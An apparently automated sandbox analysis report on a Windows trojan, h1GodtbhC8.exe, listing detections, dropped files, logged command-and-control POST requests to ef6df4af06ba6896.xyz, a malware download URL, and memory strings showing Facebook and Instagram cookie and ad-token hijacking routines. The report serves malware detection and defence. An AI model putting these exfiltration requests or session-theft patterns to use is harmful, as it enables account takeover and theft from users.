Analysis Report h1GodtbhC8.exe

Overview

General Information

Sample Name: h1GodtbhC8.exe
Analysis ID: 327203
MD5: 3ca6df4914385efd4ba9cd239b5ed254
SHA1: b66535ff43334177a5a167b9f2b07ade75484eec
SHA256: 0acebaf80946be0cb3099233e8807aa775c8304fc3dee48d42241ff68b7ab318
Tags: exe

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
May check the online IP address of the machine
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Antivirus or Machine Learning detection for unpacked file
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
File is packed with WinRar
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: h1GodtbhC8.exe Avira: detected
Antivirus detection for URL or domain
Source: http://www.sodown.xyz/index.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: dream.pics Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: h1GodtbhC8.exe Virustotal: Detection: 46% Perma Link
Source: h1GodtbhC8.exe Metadefender: Detection: 16% Perma Link
Source: h1GodtbhC8.exe ReversingLabs: Detection: 64%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: h1GodtbhC8.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 25.2.1E1C360C582DF797.exe.4330000.4.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 21.2.1E1C360C582DF797.exe.42a0000.6.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 4.2.aliens.exe.42c0000.4.unpack Avira: Label: TR/Patched.Ren.Gen2

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 4_2_1001F720

Spreading:

barindex
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: z: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: x: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: v: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: t: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: r: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: p: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: n: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: l: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: j: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: h: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: f: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: b: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: y: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: w: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: u: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: s: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: q: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: o: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: m: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: k: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: i: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: g: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: e: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: c: Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: a: Jump to behavior
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose, 0_2_6E660F62
Source: C:\Users\user\Desktop\h1GodtbhC8.exe Code function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose, 0_2_6E651C23
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 1_2_0121A534
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0123A928 FindFirstFileExA, 1_2_0123A928
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe Code function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 1_2_0122B820
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_00402D09 FindFirstFileA, 4_2_00402D09
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_0040693B
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_004066CC FindFirstFileA,FindClose, 4_2_004066CC
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe Code function: 4_2_1001A170 FindFirstFileA,FindClose, 4_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose, 21_2_026DC704
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8, 21_2_026E1F70
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose, 21_2_04FA7950
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe Code function: 21_2_04FA5A90 FindFirstFileA,FindClose, 21_2_04FA5A90

Networking:

barindex
May check the online IP address of the machine
Source: unknown DNS query: name: iplogger.org
Source: unknown DNS query: name: iplogger.org
Uses ping.exe to check the status of other devices and networks
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /info/ddd HTTP/1.1Host: EF6DF4AF06BA6896.xyzAccept: */*
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 677Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 1405Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: GET /info/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 93Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: POST /info/du HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 125Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: GET /info/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: ef6df4af06ba6896.xyz
Source: global traffic HTTP traffic detected: GET /info/ddd HTTP/1.1Host: EF6DF4AF06BA6896.xyzAccept: */*
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe String found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com_7 equals www.youtube.com (Youtube)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
